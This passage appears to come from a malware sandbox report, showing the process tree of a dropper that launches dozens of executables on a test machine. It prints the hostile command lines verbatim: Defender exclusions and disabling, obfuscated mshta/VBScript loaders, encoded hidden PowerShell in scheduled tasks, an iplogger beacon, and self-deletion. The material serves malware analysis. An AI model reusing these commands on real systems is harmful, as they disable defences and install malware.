cmd.exe Thu02483b39590da5492.exe PID 1344 wrote to memory of 2688 1344 cmd.exe Thu02483b39590da5492.exe PID 2736 wrote to memory of 1540 2736 cmd.exe Thu02bfe1521bcc038.exe PID 2736 wrote to memory of 1540 2736 cmd.exe Thu02bfe1521bcc038.exe PID 2736 wrote to memory of 1540 2736 cmd.exe Thu02bfe1521bcc038.exe PID 3940 wrote to memory of 1192 3940 Thu0247e977c7950492a.exe Thu0247e977c7950492a.exe PID 3940 wrote to memory of 1192 3940 Thu0247e977c7950492a.exe Thu0247e977c7950492a.exe PID 3940 wrote to memory of 1192 3940 Thu0247e977c7950492a.exe Thu0247e977c7950492a.exe PID 1540 wrote to memory of 2208 1540 Thu02bfe1521bcc038.exe dllhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"C:\Users\Admin\AppData\Local\Temp\071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0247e977c7950492a.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu0247e977c7950492a.exeThu0247e977c7950492a.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu0247e977c7950492a.exe"C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu0247e977c7950492a.exe" -a5⤵
- Executes dropped EXE
PID:1192
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu0299d0d70a4d322.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3132 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu0299d0d70a4d322.exeThu0299d0d70a4d322.exe4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02483b39590da5492.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu02483b39590da5492.exeThu02483b39590da5492.exe4⤵
- Executes dropped EXE
PID:2688
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu02d385ff55.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\Thu02d385ff55.exeThu02d385ff55.exe4⤵
- Executes dropped EXE
- Checks computer location settings
PID:3788 -
C:\Users\Admin\Documents\bgM6SZzcFD4wqeRjzrwgTPEn.exe"C:\Users\Admin\Documents\bgM6SZzcFD4wqeRjzrwgTPEn.exe"5⤵
- Executes dropped EXE
PID:4992 -
C:\Users\Admin\Documents\bgM6SZzcFD4wqeRjzrwgTPEn.exe"C:\Users\Admin\Documents\bgM6SZzcFD4wqeRjzrwgTPEn.exe"6⤵PID:5144
-
-
-
C:\Users\Admin\Documents\HauY9OXiANSqjbeLDAzeneWP.exe"C:\Users\Admin\Documents\HauY9OXiANSqjbeLDAzeneWP.exe"5⤵
- Executes dropped EXE
PID:4984
-
-
C:\Users\Admin\Documents\ELoSOJbyNqIIENjddsNV_jk8.exe"C:\Users\Admin\Documents\ELoSOJbyNqIIENjddsNV_jk8.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Users\Admin\Documents\ucNTSxJixhBPpqJqlxecqGIk.exe"C:\Users\Admin\Documents\ucNTSxJixhBPpqJqlxecqGIk.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4956
-
-
C:\Users\Admin\Documents\JGMLQmdZufFmZt_n3dkCIpwM.exe"C:\Users\Admin\Documents\JGMLQmdZufFmZt_n3dkCIpwM.exe"5⤵
- Executes dropped EXE
PID:4920
-
-
C:\Users\Admin\Documents\Neek_h8G325oOaR1DwrPrj0I.exe"C:\Users\Admin\Documents\Neek_h8G325oOaR1DwrPrj0I.exe"5⤵
- Executes dropped EXE
PID:4960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 6566⤵
- Program crash
PID:5560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 6726⤵
- Program crash
PID:4484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 7366⤵
- Program crash
PID:3148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 7326⤵
- Program crash
PID:5616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4960 -s 10766⤵
- Program crash
PID:2292
-
-
-
C:\Users\Admin\Documents\xj96NMMwHZc3VfHCeIW4idK5.exe"C:\Users\Admin\Documents\xj96NMMwHZc3VfHCeIW4idK5.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4936 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "210921.exe" & start "" "269new.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"6⤵PID:1468
-
C:\Users\Admin\AppData\Local\Temp\210921.exe"210921.exe"7⤵
- Executes dropped EXE
PID:4796
-
-
C:\Users\Admin\AppData\Local\Temp\269new.exe"269new.exe"7⤵PID:4212
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1nGFr7"7⤵PID:1476
-
-
-
-
C:\Users\Admin\Documents\PNEDROaWj9z3C1l4ZYrg2Vk_.exe"C:\Users\Admin\Documents\PNEDROaWj9z3C1l4ZYrg2Vk_.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4928
-
-
C:\Users\Admin\Documents\xKdIhrs2hpbf0CMryCGMnIAw.exe"C:\Users\Admin\Documents\xKdIhrs2hpbf0CMryCGMnIAw.exe"5⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4908 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:5864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST6⤵
- Creates scheduled task(s)
PID:5856
-
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"6⤵PID:5832
-
C:\Users\Admin\Documents\56K2yEwMPjKjlXLyJzqxtgEh.exe"C:\Users\Admin\Documents\56K2yEwMPjKjlXLyJzqxtgEh.exe"7⤵PID:6840
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\Documents\56K2yEwMPjKjlXLyJzqxtgEh.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\Documents\56K2yEwMPjKjlXLyJzqxtgEh.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )8⤵PID:7104
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\Documents\56K2yEwMPjKjlXLyJzqxtgEh.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\Documents\56K2yEwMPjKjlXLyJzqxtgEh.exe" ) do taskkill -F -Im "%~nXU"9⤵PID:4364
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK10⤵PID:6704
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )11⤵PID:5276
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"12⤵PID:7440
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )11⤵PID:7844
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM12⤵PID:5276
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵PID:8096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"13⤵PID:1672
-
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM13⤵PID:5084
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM14⤵PID:5368
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM15⤵PID:2580
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM16⤵PID:2028
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "56K2yEwMPjKjlXLyJzqxtgEh.exe"10⤵
- Kills process with taskkill
PID:7252
-
-
-
-
-
C:\Users\Admin\Documents\IEr3Ls3NGbXOVMbhuEq27lec.exe"C:\Users\Admin\Documents\IEr3Ls3NGbXOVMbhuEq27lec.exe"7⤵PID:6820
-
-
C:\Users\Admin\Documents\y2Y4eOSoaViD5ms7yvalKsJ3.exe"C:\Users\Admin\Documents\y2Y4eOSoaViD5ms7yvalKsJ3.exe" /mixtwo7⤵PID:2600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 6488⤵
- Program crash
PID:7756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 6608⤵
- Program crash
PID:7268
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 6848⤵
- Program crash
PID:7844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 8008⤵
- Program crash
PID:7504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 8808⤵
- Program crash
PID:7884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 9288⤵
- Program crash
PID:5508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2600 -s 10848⤵
- Program crash
PID:5504
-
-
-
C:\Users\Admin\Documents\gEMjLYLnOMd3610d6KB4BbWB.exe"C:\Users\Admin\Documents\gEMjLYLnOMd3610d6KB4BbWB.exe"7⤵PID:3892
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe8⤵PID:7016
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe9⤵
- Kills process with taskkill
PID:6748
-
-
-
-
C:\Users\Admin\Documents\CKT6JDz7SPpf3QcAFomdqJXb.exe"C:\Users\Admin\Documents\CKT6JDz7SPpf3QcAFomdqJXb.exe"7⤵PID:1372
-
-
C:\Users\Admin\Documents\YM49iwiFwBWKvCAWrrgMk9j_.exe"C:\Users\Admin\Documents\YM49iwiFwBWKvCAWrrgMk9j_.exe"7⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\7zSE1EB.tmp\Install.exe.\Install.exe8⤵PID:6240
-
C:\Users\Admin\AppData\Local\Temp\7zSEBEE.tmp\Install.exe.\Install.exe /S /site_id "668658"9⤵PID:5032
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &10⤵PID:5792
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
PID:2896
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"11⤵PID:4720
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:7832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:8100
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:8144
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"11⤵PID:9860
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:10016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:9124
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:11376
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"11⤵PID:9552
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵PID:9812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵PID:10244
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵PID:9868
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"10⤵PID:8072
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&11⤵PID:7576
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3212⤵PID:5272
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6412⤵PID:4252
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"10⤵PID:8104
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&11⤵PID:7828
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6412⤵PID:6404
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZkwAoJrN" /SC once /ST 18:17:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="10⤵
- Creates scheduled task(s)
PID:6152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZkwAoJrN"10⤵PID:7840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZkwAoJrN"10⤵PID:6560
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 20:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\OWwqPRg.exe\" uG /site_id 668658 /S" /V1 /F10⤵
- Creates scheduled task(s)
PID:8244
-
-
-
-
-
C:\Users\Admin\Documents\4dDAmyFZRV8vwjUqo5ZUrozw.exe"C:\Users\Admin\Documents\4dDAmyFZRV8vwjUqo5ZUrozw.exe"7⤵PID:7244
-
-
C:\Users\Admin\Documents\DpBTPnV1d1wkJwjSlqKED4E7.exe"C:\Users\Admin\Documents\DpBTPnV1d1wkJwjSlqKED4E7.exe"7⤵PID:4020
-
C:\Users\Admin\Documents\DpBTPnV1d1wkJwjSlqKED4E7.exe"C:\Users\Admin\Documents\DpBTPnV1d1wkJwjSlqKED4E7.exe"8⤵PID:4696
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:4748
-
-
-
-
C:\Users\Admin\Documents\B29QZisT_btnw4PwOfF3ixRo.exe"C:\Users\Admin\Documents\B29QZisT_btnw4PwOfF3ixRo.exe"7⤵PID:7628
-
C:\Users\Admin\AppData\Local\Temp\tmp3A8B_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp3A8B_tmp.exe"8⤵PID:7476
-
C:\Users\Admin\AppData\Local\Temp\tmp3A8B_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmp3A8B_tmp.exe9⤵PID:4944
-
-
-
-
C:\Users\Admin\Documents\G52VgTWIn4TW1FecrAQokoFe.exe"C:\Users\Admin\Documents\G52VgTWIn4TW1FecrAQokoFe.exe" silent7⤵PID:6944
-
-
-
-
C:\Users\Admin\Documents\pPrCdc38TjM_66g0Ylwoyi1d.exe"C:\Users\Admin\Documents\pPrCdc38TjM_66g0Ylwoyi1d.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4896 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2696
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:5996
-
-
-
-
C:\Users\Admin\Documents\Adb7VpOvSRmGGDjMfj84b8SD.exe"C:\Users\Admin\Documents\Adb7VpOvSRmGGDjMfj84b8SD.exe"5⤵
- Executes dropped EXE
PID:4880 -
C:\Users\Admin\Documents\Adb7VpOvSRmGGDjMfj84b8SD.exeC:\Users\Admin\Documents\Adb7VpOvSRmGGDjMfj84b8SD.exe6⤵PID:2880
-
-
-
C:\Users\Admin\Documents\N0T6kUNSszPjslOz7quKpN3n.exe"C:\Users\Admin\Documents\N0T6kUNSszPjslOz7quKpN3n.exe"5⤵
- Executes dropped EXE
PID:4236 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im N0T6kUNSszPjslOz7quKpN3n.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\N0T6kUNSszPjslOz7quKpN3n.exe" & del C:\ProgramData\*.dll & exit6⤵PID:6456
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im N0T6kUNSszPjslOz7quKpN3n.exe /f7⤵
- Kills process with taskkill
PID:6684
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
PID:4748
-
-
-
-
C:\Users\Admin\Documents\G_QdsKdP9K38L5CruVQuqJJm.exe"C:\Users\Admin\Documents\G_QdsKdP9K38L5CruVQuqJJm.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4132
-
-
C:\Users\Admin\Documents\jgzAoeicJ0xruGP9h9cYuvl1.exe"C:\Users\Admin\Documents\jgzAoeicJ0xruGP9h9cYuvl1.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4120
-
-
C:\Users\Admin\Documents\FO53vX41q8kgjZOQMFvfXiLp.exe"C:\Users\Admin\Documents\FO53vX41q8kgjZOQMFvfXiLp.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4112
-
-
C:\Users\Admin\Documents\D85AFybjUj1qFBqVqSTjR3Xv.exe"C:\Users\Admin\Documents\D85AFybjUj1qFBqVqSTjR3Xv.exe"5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5112
-
-
C:\Users\Admin\Documents\e9aGzlA2z816FvSpI98ghOCD.exe"C:\Users\Admin\Documents\e9aGzlA2z816FvSpI98ghOCD.exe"5⤵
- Executes dropped EXE
PID:5104 -
C:\Users\Admin\Documents\e9aGzlA2z816FvSpI98ghOCD.exeC:\Users\Admin\Documents\e9aGzlA2z816FvSpI98ghOCD.exe6⤵PID:1832
-
-
-
C:\Users\Admin\Documents\zwNuxkUY6ZqMnzvQ3Q2AJwBy.exe"C:\Users\Admin\Documents\zwNuxkUY6ZqMnzvQ3Q2AJwBy.exe"5⤵
- Executes dropped EXE
PID:5088 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5088 -s 12726⤵
- Program crash
PID:5800
-
-
-
C:\Users\Admin\Documents\G3lGZJhyunaBOvMs4LfdAnFA.exe"C:\Users\Admin\Documents\G3lGZJhyunaBOvMs4LfdAnFA.exe"5⤵
- Executes dropped EXE
PID:5076 -
C:\Users\Admin\AppData\Local\Temp\7zS8E13.tmp\Install.exe.\Install.exe6⤵
- Executes dropped EXE
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\7zSD117.tmp\Install.exe.\Install.exe /S /site_id "394347"7⤵PID:5248
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender 